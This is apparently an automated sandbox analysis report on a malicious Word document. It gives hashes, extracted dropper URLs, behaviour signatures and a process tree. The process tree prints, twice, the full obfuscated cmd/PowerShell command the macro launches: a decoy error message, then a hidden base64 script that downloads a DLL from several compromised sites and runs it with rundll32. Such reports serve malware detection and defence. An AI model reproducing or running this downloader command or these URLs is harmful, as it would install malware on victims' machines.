Analysis

  • max time kernel
    139s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-01-2021 15:03

General

  • Target

    dec.-29-10241-2020.doc

  • Size

    164KB

  • MD5

    7c7a1228de4b8b46430ba7556f57ad99

  • SHA1

    e5b8599b9c4c858c0a83f32852a63943f57523c9

  • SHA256

    d178d1afaa2640706dfb3240c0144e2f2f4ac427f1958223b9521e9581104df6

  • SHA512

    1e8fe72c1ab2c4be24ef1f9ccebc9183f6053e5e13605e92d54635322b23a13afea8e7593cfbbbfe3d41f13468c73946b9e603ba4330446de508c93cedf94b1a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://206.189.146.42/wp-admin/F0xAutoConfig/XR9/

exe.dropper

http://paroissesaintabraham.com/wp-admin/H/

exe.dropper

https://lnfch.com/wp-includes/quC/

exe.dropper

https://nahlasolimandesigns.com/wp-admin/0HHK7/

exe.dropper

http://harmonimedia.com/wp-content/uploads/Zol/

exe.dropper

http://ncap.lbatechnologies.com/media/6iQ/

exe.dropper

https://lainiotisllc.com/postauth/7XhB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dec.-29-10241-2020.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4688
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwAJwBTAFQAZQBNAC4AJwAsACcAVABvAHIAWQAnACwAJwBJAG8AJwAsACcAUwBZACcAKQAgACAAKQAgADsAIABzAHYAIAAoACIAVQAiACsAIgBoAEIAIgApACAAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsANwB9AHsAMgB9AHsAMQB9AHsAOAB9AHsANAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBOAGEARwBlAHIAJwAsACcATQAuACcALAAnAGUAJwAsACcASQBjAEUAUABvAGkATgAnACwAJwBzAEUAUgBWACcALAAnAE0AQQAnACwAJwB0ACcALAAnAHMAeQBzAHQAJwAsACcAbgBlAHQALgAnACkAIAAgACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACgAJwBpACcAKwAnAGwAZQBuAHQAJwApACsAJwBsACcAKwAnAHkAJwArACgAJwBDAG8AbgAnACsAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAE8AYwBoAGcAYQBwADIAPQAkAFAAMwA5AFEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AXwAwAEEAOwAkAFYANwAxAEYAPQAoACcAWAAyACcAKwAnADAAUgAnACkAOwAgACgAVgBBAFIASQBhAEIATABlACAAIAA2AEoAUgApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAQQB0AGAARQBEAEkAYABSAGUAYwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBmAFEAdQAnACsAJwBYAGYAJwApACsAKAAnADUAcAAnACsAJwA3ADcAJwApACsAJwBxACcAKwAoACcAZgBRACcAKwAnAHUAVQAxACcAKQArACcAZwB2ACcAKwAoACcAYgAxAHEAZgAnACsAJwBRACcAKQArACcAdQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAnAGYAUQAnACsAJwB1ACcAKQAsAFsAcwBUAFIASQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEQAMgA1AEIAPQAoACcASgAnACsAKAAnADQAJwArACcAMABMACcAKQApADsAIAAgACgAIABEAEkAcgAgACgAIgBWAEEAcgBJAEEAYgBsACIAKwAiAGUAOgB1AEgAIgArACIAYgAiACkAIAApAC4AVgBBAGwAdQBFADoAOgAiAFMAYABFAGMAVQBSAEkAYABUAFkAYABQAGAAUgBvAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQQA5ADgASgA9ACgAKAAnAFYAOAAnACsAJwAyACcAKQArACcAUwAnACkAOwAkAFkAbwBoAGUAdgB3AGoAIAA9ACAAKAAnAEYAJwArACgAJwBfADUAJwArACcAUAAnACkAKQA7ACQAVwA5ADcATAA9ACgAKAAnAEwAJwArACcAMwAxACcAKQArACcASgAnACkAOwAkAEkAOAA1AHYAaABfAHYAPQAkAEgATwBNAEUAKwAoACgAJwBOAFIAJwArACgAJwBhAFgAZgA1ACcAKwAnAHAANwA3ACcAKwAnAHEATgAnACkAKwAoACcAUgBhACcAKwAnAFUAMQBnACcAKQArACcAdgAnACsAJwBiACcAKwAoACcAMQBxAE4AJwArACcAUgAnACkAKwAnAGEAJwApACAAIAAtAHIARQBQAEwAYQBDAGUAIAAgACgAJwBOACcAKwAnAFIAYQAnACkALABbAEMASABhAHIAXQA5ADIAKQArACQAWQBvAGgAZQB2AHcAagArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEwAOQA4AFIAPQAoACcARwAnACsAKAAnADEAJwArACcANQBJACcAKQApADsAJABWAGcAcgAxAGIAcQB5AD0AKAAoACcAXQBiADIAJwArACcAWwAnACsAJwBzADoALwAnACkAKwAnAC8AMgAnACsAKAAnADAANgAuACcAKwAnADEAJwApACsAJwA4ACcAKwAnADkAJwArACcALgAxACcAKwAnADQAJwArACgAJwA2AC4AJwArACcANAAyACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwBGADAAeAAnACsAJwBBAHUAdAAnACsAJwBvACcAKQArACgAJwBDAG8AbgBmAGkAJwArACcAZwAvAFgAJwArACcAUgAnACkAKwAnADkAJwArACgAJwAvACcAKwAnAEAAXQBiACcAKQArACcAMgAnACsAJwBbACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAcAAnACsAJwBhAHIAbwBpAHMAcwBlAHMAJwArACcAYQBpACcAKwAnAG4AdABhAGIAJwArACcAcgAnACkAKwAnAGEAJwArACgAJwBoAGEAJwArACcAbQAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAJwArACcAbQBpAG4ALwBIACcAKwAnAC8AQABdACcAKQArACgAJwBiADIAJwArACcAWwBzAHMAOgAvAC8AJwApACsAKAAnAGwAbgAnACsAJwBmAGMAJwApACsAKAAnAGgALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAAnACsAJwB1AGQAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAHEAdQBDACcAKwAnAC8AQAAnACkAKwAoACcAXQBiACcAKwAnADIAWwAnACkAKwAnAHMAcwAnACsAKAAnADoALwAnACsAJwAvAG4AJwArACcAYQBoAGwAJwApACsAKAAnAGEAcwAnACsAJwBvACcAKQArACcAbAAnACsAKAAnAGkAbQBhAG4AZABlACcAKwAnAHMAaQAnACkAKwAoACcAZwBuACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACcAZABtACcAKwAnAGkAJwArACcAbgAnACsAKAAnAC8AMABIAEgAJwArACcASwA3AC8AQABdACcAKwAnAGIAMgAnACkAKwAnAFsAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACcAaAAnACsAJwBhAHIAJwArACcAbQAnACsAJwBvACcAKwAnAG4AJwArACgAJwBpACcAKwAnAG0AZQAnACkAKwAoACcAZAAnACsAJwBpAGEALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjAG8AJwApACsAJwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwAnACsAJwB1ACcAKQArACcAcABsACcAKwAoACcAbwAnACsAJwBhAGQAcwAvAFoAbwBsAC8AJwArACcAQAAnACkAKwAnAF0AYgAnACsAJwAyACcAKwAoACcAWwAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwBuAGMAJwArACcAYQAnACkAKwAnAHAAJwArACgAJwAuAGwAYgAnACsAJwBhAHQAZQBjACcAKwAnAGgAJwArACcAbgBvAGwAJwApACsAKAAnAG8AZwBpACcAKwAnAGUAcwAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAG0AZQBkACcAKwAnAGkAJwArACcAYQAnACsAJwAvACcAKQArACgAJwA2ACcAKwAnAGkAUQAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyAFsAcwBzADoAJwApACsAJwAvAC8AJwArACgAJwBsACcAKwAnAGEAaQBuAGkAbwAnACkAKwAnAHQAJwArACcAaQAnACsAJwBzACcAKwAnAGwAJwArACcAbABjACcAKwAoACcALgBjAG8AbQAvAHAAbwBzAHQAJwArACcAYQB1ACcAKwAnAHQAJwArACcAaAAvADcAJwArACcAWAAnACsAJwBoAEIALwAnACkAKQAuACIAcgBFAGAAcABgAEwAYQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQAWgBfADgAUQAgACsAIAAkAE8AYwBoAGcAYQBwADIAIAArACAAJABHADEAMgBJACkAOwAkAEUAOQA5AEEAPQAoACgAJwBPACcAKwAnADgANQAnACkAKwAnAEYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGsAbgBuAHkAaQBvACAAaQBuACAAJABWAGcAcgAxAGIAcQB5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwBUAEUATQAuAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBuAHQAKQAuACIARABvAGAAdwBOAGwATwBBAGQARgBJAGAATABFACIAKAAkAE0AawBuAG4AeQBpAG8ALAAgACQASQA4ADUAdgBoAF8AdgApADsAJABWADkANABSAD0AKAAnAEEAXwAnACsAJwA1AFcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAOAA1AHYAaABfAHYAKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASQA4ADUAdgBoAF8AdgAsACgAKAAnAEMAbwBuACcAKwAnAHQAcgBvAGwAXwAnACkAKwAnAFIAJwArACcAdQAnACsAKAAnAG4ARAAnACsAJwBMAEwAJwApACkALgAiAHQATwBTAFQAYABSAEkAYABOAGcAIgAoACkAOwAkAE8AMQA1AEIAPQAoACgAJwBEACcAKwAnAF8AXwAnACkAKwAnAFoAJwApADsAYgByAGUAYQBrADsAJABCADgANgBOAD0AKAAoACcAQQA4ACcAKwAnADcAJwApACsAJwBJACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgAzADIASwA9ACgAJwBSADEAJwArACcANgBMACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3228
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:4056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwAJwBTAFQAZQBNAC4AJwAsACcAVABvAHIAWQAnACwAJwBJAG8AJwAsACcAUwBZACcAKQAgACAAKQAgADsAIABzAHYAIAAoACIAVQAiACsAIgBoAEIAIgApACAAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsANwB9AHsAMgB9AHsAMQB9AHsAOAB9AHsANAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBOAGEARwBlAHIAJwAsACcATQAuACcALAAnAGUAJwAsACcASQBjAEUAUABvAGkATgAnACwAJwBzAEUAUgBWACcALAAnAE0AQQAnACwAJwB0ACcALAAnAHMAeQBzAHQAJwAsACcAbgBlAHQALgAnACkAIAAgACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACgAJwBpACcAKwAnAGwAZQBuAHQAJwApACsAJwBsACcAKwAnAHkAJwArACgAJwBDAG8AbgAnACsAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAE8AYwBoAGcAYQBwADIAPQAkAFAAMwA5AFEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AXwAwAEEAOwAkAFYANwAxAEYAPQAoACcAWAAyACcAKwAnADAAUgAnACkAOwAgACgAVgBBAFIASQBhAEIATABlACAAIAA2AEoAUgApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAQQB0AGAARQBEAEkAYABSAGUAYwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBmAFEAdQAnACsAJwBYAGYAJwApACsAKAAnADUAcAAnACsAJwA3ADcAJwApACsAJwBxACcAKwAoACcAZgBRACcAKwAnAHUAVQAxACcAKQArACcAZwB2ACcAKwAoACcAYgAxAHEAZgAnACsAJwBRACcAKQArACcAdQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAnAGYAUQAnACsAJwB1ACcAKQAsAFsAcwBUAFIASQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEQAMgA1AEIAPQAoACcASgAnACsAKAAnADQAJwArACcAMABMACcAKQApADsAIAAgACgAIABEAEkAcgAgACgAIgBWAEEAcgBJAEEAYgBsACIAKwAiAGUAOgB1AEgAIgArACIAYgAiACkAIAApAC4AVgBBAGwAdQBFADoAOgAiAFMAYABFAGMAVQBSAEkAYABUAFkAYABQAGAAUgBvAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQQA5ADgASgA9ACgAKAAnAFYAOAAnACsAJwAyACcAKQArACcAUwAnACkAOwAkAFkAbwBoAGUAdgB3AGoAIAA9ACAAKAAnAEYAJwArACgAJwBfADUAJwArACcAUAAnACkAKQA7ACQAVwA5ADcATAA9ACgAKAAnAEwAJwArACcAMwAxACcAKQArACcASgAnACkAOwAkAEkAOAA1AHYAaABfAHYAPQAkAEgATwBNAEUAKwAoACgAJwBOAFIAJwArACgAJwBhAFgAZgA1ACcAKwAnAHAANwA3ACcAKwAnAHEATgAnACkAKwAoACcAUgBhACcAKwAnAFUAMQBnACcAKQArACcAdgAnACsAJwBiACcAKwAoACcAMQBxAE4AJwArACcAUgAnACkAKwAnAGEAJwApACAAIAAtAHIARQBQAEwAYQBDAGUAIAAgACgAJwBOACcAKwAnAFIAYQAnACkALABbAEMASABhAHIAXQA5ADIAKQArACQAWQBvAGgAZQB2AHcAagArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEwAOQA4AFIAPQAoACcARwAnACsAKAAnADEAJwArACcANQBJACcAKQApADsAJABWAGcAcgAxAGIAcQB5AD0AKAAoACcAXQBiADIAJwArACcAWwAnACsAJwBzADoALwAnACkAKwAnAC8AMgAnACsAKAAnADAANgAuACcAKwAnADEAJwApACsAJwA4ACcAKwAnADkAJwArACcALgAxACcAKwAnADQAJwArACgAJwA2AC4AJwArACcANAAyACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwBGADAAeAAnACsAJwBBAHUAdAAnACsAJwBvACcAKQArACgAJwBDAG8AbgBmAGkAJwArACcAZwAvAFgAJwArACcAUgAnACkAKwAnADkAJwArACgAJwAvACcAKwAnAEAAXQBiACcAKQArACcAMgAnACsAJwBbACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAcAAnACsAJwBhAHIAbwBpAHMAcwBlAHMAJwArACcAYQBpACcAKwAnAG4AdABhAGIAJwArACcAcgAnACkAKwAnAGEAJwArACgAJwBoAGEAJwArACcAbQAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAJwArACcAbQBpAG4ALwBIACcAKwAnAC8AQABdACcAKQArACgAJwBiADIAJwArACcAWwBzAHMAOgAvAC8AJwApACsAKAAnAGwAbgAnACsAJwBmAGMAJwApACsAKAAnAGgALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAAnACsAJwB1AGQAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAHEAdQBDACcAKwAnAC8AQAAnACkAKwAoACcAXQBiACcAKwAnADIAWwAnACkAKwAnAHMAcwAnACsAKAAnADoALwAnACsAJwAvAG4AJwArACcAYQBoAGwAJwApACsAKAAnAGEAcwAnACsAJwBvACcAKQArACcAbAAnACsAKAAnAGkAbQBhAG4AZABlACcAKwAnAHMAaQAnACkAKwAoACcAZwBuACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACcAZABtACcAKwAnAGkAJwArACcAbgAnACsAKAAnAC8AMABIAEgAJwArACcASwA3AC8AQABdACcAKwAnAGIAMgAnACkAKwAnAFsAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACcAaAAnACsAJwBhAHIAJwArACcAbQAnACsAJwBvACcAKwAnAG4AJwArACgAJwBpACcAKwAnAG0AZQAnACkAKwAoACcAZAAnACsAJwBpAGEALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjAG8AJwApACsAJwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwAnACsAJwB1ACcAKQArACcAcABsACcAKwAoACcAbwAnACsAJwBhAGQAcwAvAFoAbwBsAC8AJwArACcAQAAnACkAKwAnAF0AYgAnACsAJwAyACcAKwAoACcAWwAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwBuAGMAJwArACcAYQAnACkAKwAnAHAAJwArACgAJwAuAGwAYgAnACsAJwBhAHQAZQBjACcAKwAnAGgAJwArACcAbgBvAGwAJwApACsAKAAnAG8AZwBpACcAKwAnAGUAcwAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAG0AZQBkACcAKwAnAGkAJwArACcAYQAnACsAJwAvACcAKQArACgAJwA2ACcAKwAnAGkAUQAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyAFsAcwBzADoAJwApACsAJwAvAC8AJwArACgAJwBsACcAKwAnAGEAaQBuAGkAbwAnACkAKwAnAHQAJwArACcAaQAnACsAJwBzACcAKwAnAGwAJwArACcAbABjACcAKwAoACcALgBjAG8AbQAvAHAAbwBzAHQAJwArACcAYQB1ACcAKwAnAHQAJwArACcAaAAvADcAJwArACcAWAAnACsAJwBoAEIALwAnACkAKQAuACIAcgBFAGAAcABgAEwAYQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQAWgBfADgAUQAgACsAIAAkAE8AYwBoAGcAYQBwADIAIAArACAAJABHADEAMgBJACkAOwAkAEUAOQA5AEEAPQAoACgAJwBPACcAKwAnADgANQAnACkAKwAnAEYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGsAbgBuAHkAaQBvACAAaQBuACAAJABWAGcAcgAxAGIAcQB5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwBUAEUATQAuAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBuAHQAKQAuACIARABvAGAAdwBOAGwATwBBAGQARgBJAGAATABFACIAKAAkAE0AawBuAG4AeQBpAG8ALAAgACQASQA4ADUAdgBoAF8AdgApADsAJABWADkANABSAD0AKAAnAEEAXwAnACsAJwA1AFcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAOAA1AHYAaABfAHYAKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASQA4ADUAdgBoAF8AdgAsACgAKAAnAEMAbwBuACcAKwAnAHQAcgBvAGwAXwAnACkAKwAnAFIAJwArACcAdQAnACsAKAAnAG4ARAAnACsAJwBMAEwAJwApACkALgAiAHQATwBTAFQAYABSAEkAYABOAGcAIgAoACkAOwAkAE8AMQA1AEIAPQAoACgAJwBEACcAKwAnAF8AXwAnACkAKwAnAFoAJwApADsAYgByAGUAYQBrADsAJABCADgANgBOAD0AKAAoACcAQQA4ACcAKwAnADcAJwApACsAJwBJACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgAzADIASwA9ACgAJwBSADEAJwArACcANgBMACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3088

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3088-4-0x0000000000000000-mapping.dmp
    • memory/3088-5-0x00007FFCE6E60000-0x00007FFCE784C000-memory.dmp
      Filesize

      9.9MB

    • memory/3088-6-0x000002B9A71F0000-0x000002B9A71F1000-memory.dmp
      Filesize

      4KB

    • memory/3088-7-0x000002B9A7710000-0x000002B9A7711000-memory.dmp
      Filesize

      4KB

    • memory/4056-3-0x0000000000000000-mapping.dmp
    • memory/4688-2-0x00007FFCEDB10000-0x00007FFCEE147000-memory.dmp
      Filesize

      6.2MB